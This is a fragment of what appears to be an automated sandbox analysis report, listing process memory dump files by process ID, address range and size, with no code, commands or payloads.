                                                                  • memory/4692-193-0x000001D42F4E0000-0x000001D42F4E6000-memory.dmp
                                                                    Filesize

                                                                    24KB

                                                                  • memory/4692-190-0x000001D42F4A0000-0x000001D42F4AA000-memory.dmp
                                                                    Filesize

                                                                    40KB

                                                                  • memory/4692-189-0x000001D42F4C0000-0x000001D42F4DC000-memory.dmp
                                                                    Filesize

                                                                    112KB

                                                                  • memory/4692-187-0x00007FFD520C0000-0x00007FFD52B81000-memory.dmp
                                                                    Filesize

                                                                    10MB

                                                                  • memory/4720-165-0x0000000000000000-mapping.dmp
                                                                  • memory/4796-154-0x0000000000000000-mapping.dmp
                                                                  • memory/4880-152-0x0000000000000000-mapping.dmp
                                                                  • memory/4944-180-0x0000000000000000-mapping.dmp
                                                                  • memory/4964-147-0x0000000000000000-mapping.dmp
                                                                  • memory/5032-158-0x0000000000000000-mapping.dmp
                                                                  • memory/5036-213-0x0000000000000000-mapping.dmp
                                                                  • memory/5104-205-0x0000000000000000-mapping.dmp